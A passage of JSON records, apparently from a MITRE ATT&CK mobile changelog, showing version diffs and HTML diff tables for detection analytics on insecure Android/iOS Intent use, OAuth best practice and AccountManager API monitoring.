                            "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.",
                            "url": "https://tools.ietf.org/html/rfc8252"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1693",
                    "description": "When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Defenders should validate the entirety of the URI. For example, the URI's scheme should be `https` and the URI's host should be on a list of trusted hosts.(Citation: Android_UnsafeURILoading_Sept2024)\n\nDevelopers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\n\nOn Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
                            "name": "Application Vetting",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4",
                            "name": "User Interface",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-02 20:08:42.566000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Defenders should validate the entirety of the URI. For example, the URI's scheme should be `https` and the URI's host should be on a list of trusted hosts.(Citation: Android_UnsafeURILoading_Sept2024)\\n\\nDevelopers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\\n\\nOn Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.\", \"old_value\": \"When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\\nOn Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,5 @@\\n-When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\\n+When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Defenders should validate the entirety of the URI. For example, the URI's scheme should be `https` and the URI's host should be on a list of trusted hosts.(Citation: Android_UnsafeURILoading_Sept2024)\\n+\\n+Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\\n+\\n On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][1]\": {\"source_name\": \"Android_UnsafeURILoading_Sept2024\", \"description\": \"Android Developers. (2024, September 24). Webviews \\u2013 Unsafe URI Loading. Retrieved March 2, 2026.\", \"url\": \"https://developer.android.com/privacy-and-security/risks/unsafe-uri-loading\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to155__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to155__0\"><a href=\"#difflib_chg_to155__top\">t</a></td><td class=\"diff_header\" id=\"from155_1\">1</td><td nowrap=\"nowrap\">When&nbsp;vetting&nbsp;applications&nbsp;for&nbsp;potential&nbsp;security&nbsp;weaknesses,</td><td class=\"diff_next\"><a href=\"#difflib_chg_to155__top\">t</a></td><td class=\"diff_header\" id=\"to155_1\">1</td><td nowrap=\"nowrap\">When&nbsp;vetting&nbsp;applications&nbsp;for&nbsp;potential&nbsp;security&nbsp;weaknesses,</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;vetting&nbsp;process&nbsp;could&nbsp;look&nbsp;for&nbsp;insecure&nbsp;use&nbsp;of&nbsp;Intents.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;vetting&nbsp;process&nbsp;could&nbsp;look&nbsp;for&nbsp;insecure&nbsp;use&nbsp;of&nbsp;Intents.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Dev<span class=\"diff_chg\">elopers&nbsp;should</span>&nbsp;be&nbsp;<span class=\"diff_chg\">encouraged&nbsp;to&nbsp;use</span>&nbsp;techniques&nbsp;to&nbsp;ensure</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;De<span class=\"diff_add\">fenders&nbsp;should&nbsp;</span>v<span class=\"diff_chg\">alidate&nbsp;the&nbsp;entirety&nbsp;of&nbsp;the&nbsp;URI.&nbsp;For&nbsp;exam</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;that&nbsp;the&nbsp;intent&nbsp;can&nbsp;only&nbsp;be&nbsp;sent&nbsp;to&nbsp;an&nbsp;appropriate&nbsp;destinat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ple,&nbsp;the&nbsp;URI's&nbsp;scheme&nbsp;should</span>&nbsp;be&nbsp;<span class=\"diff_chg\">`https`&nbsp;and&nbsp;the&nbsp;URI's&nbsp;host&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion&nbsp;(e.g.,&nbsp;use&nbsp;explicit&nbsp;rather&nbsp;than&nbsp;implicit&nbsp;intents,&nbsp;permis</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">hould&nbsp;be&nbsp;on&nbsp;a&nbsp;list&nbsp;of&nbsp;trusted&nbsp;hosts.(Citation:&nbsp;Android_Unsaf</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sion&nbsp;checking,&nbsp;checking&nbsp;of&nbsp;the&nbsp;destination&nbsp;app's&nbsp;signing&nbsp;cer</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">eURILoading_Sept2024)&nbsp;&nbsp;Developers&nbsp;should&nbsp;be&nbsp;encouraged&nbsp;to&nbsp;us</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tificate,&nbsp;or&nbsp;utilizing&nbsp;the&nbsp;App&nbsp;Links&nbsp;feature).&nbsp;For&nbsp;mobile&nbsp;ap</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">e</span>&nbsp;techniques&nbsp;to&nbsp;ensure&nbsp;that&nbsp;the&nbsp;intent&nbsp;can&nbsp;only&nbsp;be&nbsp;sent&nbsp;to&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">plications&nbsp;using&nbsp;OAuth,&nbsp;encourage&nbsp;use&nbsp;of&nbsp;best&nbsp;practice.<span class=\"diff_sub\">&nbsp;</span>(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;appropriate&nbsp;destination&nbsp;(e.g.,&nbsp;use&nbsp;explicit&nbsp;rather&nbsp;than&nbsp;im</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;IETF-OAuthNativeApps)(Citation:&nbsp;Android-AppLinks)&nbsp;On&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">plicit&nbsp;intents,&nbsp;permission&nbsp;checking,&nbsp;checking&nbsp;of&nbsp;the&nbsp;destina</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Android,&nbsp;users&nbsp;may&nbsp;be&nbsp;presented&nbsp;with&nbsp;a&nbsp;popup&nbsp;to&nbsp;select&nbsp;the&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;app's&nbsp;signing&nbsp;certificate,&nbsp;or&nbsp;utilizing&nbsp;the&nbsp;App&nbsp;Links&nbsp;f</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ppropriate&nbsp;application&nbsp;to&nbsp;open&nbsp;the&nbsp;URI&nbsp;in.&nbsp;If&nbsp;the&nbsp;user&nbsp;sees&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eature).&nbsp;For&nbsp;mobile&nbsp;applications&nbsp;using&nbsp;OAuth,&nbsp;encourage&nbsp;use&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">an&nbsp;application&nbsp;they&nbsp;do&nbsp;not&nbsp;recognize,&nbsp;they&nbsp;can&nbsp;remove&nbsp;it.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">of&nbsp;best&nbsp;practice.(Citation:&nbsp;IETF-OAuthNativeApps)(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Android-AppLinks)&nbsp;<span class=\"diff_add\">&nbsp;</span>On&nbsp;Android,&nbsp;users&nbsp;may&nbsp;be&nbsp;presented&nbsp;with&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;popup&nbsp;to&nbsp;select&nbsp;the&nbsp;appropriate&nbsp;application&nbsp;to&nbsp;open&nbsp;the&nbsp;URI</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;in.&nbsp;If&nbsp;the&nbsp;user&nbsp;sees&nbsp;an&nbsp;application&nbsp;they&nbsp;do&nbsp;not&nbsp;recognize,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">they&nbsp;can&nbsp;remove&nbsp;it.</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--cbdcf6f3-00c3-4c38-bc7c-ffb6806f0a25",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-02 20:11:59.312000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0626#AN1694",
                            "external_id": "AN1694"
                        },
                        {
                            "source_name": "SecureAuth_iOSOAuth_2025",
                            "description": "SecureAuth. (2025). Build an iOS App Using OAuth 2.0 and PKCE. Retrieved March 2, 2026.",
                            "url": "https://docs.secureauth.com/ciam/en/build-an-ios-app-using-oauth-2-0-and-pkce.html"
                        },
                        {
                            "source_name": "IETF-OAuthNativeApps",
                            "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.",
                            "url": "https://tools.ietf.org/html/rfc8252"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1694",
                    "description": "When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. \n\nDevelopers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: SecureAuth_iOSOAuth_2025)",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
                            "name": "Application Vetting",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4",
                            "name": "User Interface",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-02 20:11:59.312000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['external_references'][1]['source_name']\": {\"new_value\": \"SecureAuth_iOSOAuth_2025\", \"old_value\": \"Android-AppLinks\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"SecureAuth. (2025). Build an iOS App Using OAuth 2.0 and PKCE. Retrieved March 2, 2026.\", \"old_value\": \"Android. (n.d.). Handling App Links. Retrieved December 21, 2016.\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://docs.secureauth.com/ciam/en/build-an-ios-app-using-oauth-2-0-and-pkce.html\", \"old_value\": \"https://developer.android.com/training/app-links/index.html\"}, \"root['description']\": {\"new_value\": \"When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. \\n\\nDevelopers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: SecureAuth_iOSOAuth_2025)\", \"old_value\": \"When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\\nOn Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,3 @@\\n-When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\\n-On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.\\n+When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. \\n+\\n+Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: SecureAuth_iOSOAuth_2025)\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to96__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to96__0\"><a href=\"#difflib_chg_to96__top\">t</a></td><td class=\"diff_header\" id=\"from96_1\">1</td><td nowrap=\"nowrap\">When&nbsp;vetting&nbsp;applications&nbsp;for&nbsp;potential&nbsp;security&nbsp;weaknesses,</td><td class=\"diff_next\"><a href=\"#difflib_chg_to96__top\">t</a></td><td class=\"diff_header\" id=\"to96_1\">1</td><td nowrap=\"nowrap\">When&nbsp;vetting&nbsp;applications&nbsp;for&nbsp;potential&nbsp;security&nbsp;weaknesses,</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;vetting&nbsp;process&nbsp;could&nbsp;look&nbsp;for&nbsp;insecure&nbsp;use&nbsp;of&nbsp;Intents.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;vetting&nbsp;process&nbsp;could&nbsp;look&nbsp;for&nbsp;insecure&nbsp;use&nbsp;of&nbsp;Intents.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Developers&nbsp;should&nbsp;be&nbsp;encouraged&nbsp;to&nbsp;use&nbsp;techniques&nbsp;to&nbsp;ensure</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;<span class=\"diff_add\">&nbsp;&nbsp;</span>Developers&nbsp;should&nbsp;be&nbsp;encouraged&nbsp;to&nbsp;use&nbsp;techniques&nbsp;to&nbsp;ensu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;that&nbsp;the&nbsp;intent&nbsp;can&nbsp;only&nbsp;be&nbsp;sent&nbsp;to&nbsp;an&nbsp;appropriate&nbsp;destinat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re&nbsp;that&nbsp;the&nbsp;intent&nbsp;can&nbsp;only&nbsp;be&nbsp;sent&nbsp;to&nbsp;an&nbsp;appropriate&nbsp;destin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion&nbsp;(e.g.,&nbsp;use&nbsp;explicit&nbsp;rather&nbsp;than&nbsp;implicit&nbsp;intents,&nbsp;permis</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;(e.g.,&nbsp;use&nbsp;explicit&nbsp;rather&nbsp;than&nbsp;implicit&nbsp;intents,&nbsp;perm</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sion&nbsp;checking,&nbsp;checking&nbsp;of&nbsp;the&nbsp;destination&nbsp;app's&nbsp;signing&nbsp;cer</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ission&nbsp;checking,&nbsp;checking&nbsp;of&nbsp;the&nbsp;destination&nbsp;app's&nbsp;signing&nbsp;c</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tificate,&nbsp;or&nbsp;utilizing&nbsp;the&nbsp;App&nbsp;Links&nbsp;feature).&nbsp;For&nbsp;mobile&nbsp;ap</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ertificate,&nbsp;or&nbsp;utilizing&nbsp;the&nbsp;App&nbsp;Links&nbsp;feature).&nbsp;For&nbsp;mobile&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">plications&nbsp;using&nbsp;OAuth,&nbsp;encourage&nbsp;use&nbsp;of&nbsp;best&nbsp;practice.<span class=\"diff_sub\">&nbsp;</span>(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">applications&nbsp;using&nbsp;OAuth,&nbsp;encourage&nbsp;use&nbsp;of&nbsp;best&nbsp;practice.(Ci</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;IETF-OAuthNativeApps)(Citation:&nbsp;A<span class=\"diff_chg\">ndroid-</span>A<span class=\"diff_chg\">ppLinks</span>)<span class=\"diff_sub\">&nbsp;On&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;IETF-OAuthNativeApps)(Citation:&nbsp;<span class=\"diff_add\">Secure</span>A<span class=\"diff_chg\">uth_iOSO</span>A<span class=\"diff_chg\">uth_</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Android,&nbsp;users&nbsp;may&nbsp;be&nbsp;presented&nbsp;with&nbsp;a&nbsp;popup&nbsp;to&nbsp;select&nbsp;the&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">2025</span>)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ppropriate&nbsp;application&nbsp;to&nbsp;open&nbsp;the&nbsp;URI&nbsp;in.&nbsp;If&nbsp;the&nbsp;user&nbsp;sees&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">an&nbsp;application&nbsp;they&nbsp;do&nbsp;not&nbsp;recognize,&nbsp;they&nbsp;can&nbsp;remove&nbsp;it.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--6bd50b74-5852-4800-b459-1c54d95348e3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-23 23:00:36.132000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0635#AN1708",
                            "external_id": "AN1708"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1708",
                    "description": "OLD: Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS.\nApplication vetting services may look for `MANAGE_ACCOUNTS` in an Android application\u2019s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.\n\nNEW: A defender observes an Android application invoking the AccountManager API.  ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "Invocation of AccountManager.getAccounts()"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-23 23:00:36.132000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"OLD: Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS.\\nApplication vetting services may look for `MANAGE_ACCOUNTS` in an Android application\\u2019s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.\\n\\nNEW: A defender observes an Android application invoking the AccountManager API.  \", \"old_value\": \"Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS.\\nApplication vetting services may look for `MANAGE_ACCOUNTS` in an Android application\\u2019s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,4 @@\\n-Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS.\\n+OLD: Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS.\\n Application vetting services may look for `MANAGE_ACCOUNTS` in an Android application\\u2019s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.\\n+\\n+NEW: A defender observes an Android application invoking the AccountManager API.  \"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"Invocation of AccountManager.getAccounts()\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"Process\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to99__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to99__0\"><a href=\"#difflib_chg_to99__top\">t</a></td><td class=\"diff_header\" id=\"from99_1\">1</td><td nowrap=\"nowrap\">Monitor&nbsp;for&nbsp;API&nbsp;calls&nbsp;that&nbsp;are&nbsp;related&nbsp;to&nbsp;the&nbsp;AccountManager</td><td class=\"diff_next\"><a href=\"#difflib_chg_to99__top\">t</a></td><td class=\"diff_header\" id=\"to99_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">OLD:&nbsp;</span>Monitor&nbsp;for&nbsp;API&nbsp;calls&nbsp;that&nbsp;are&nbsp;related&nbsp;to&nbsp;the&nbsp;AccountMa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;API&nbsp;on&nbsp;Android&nbsp;and&nbsp;Keychain&nbsp;services&nbsp;on&nbsp;iOS.&nbsp;Application&nbsp;ve</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nager&nbsp;API&nbsp;on&nbsp;Android&nbsp;and&nbsp;Keychain&nbsp;services&nbsp;on&nbsp;iOS.&nbsp;Applicati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tting&nbsp;services&nbsp;may&nbsp;look&nbsp;for&nbsp;`MANAGE_ACCOUNTS`&nbsp;in&nbsp;an&nbsp;Android&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 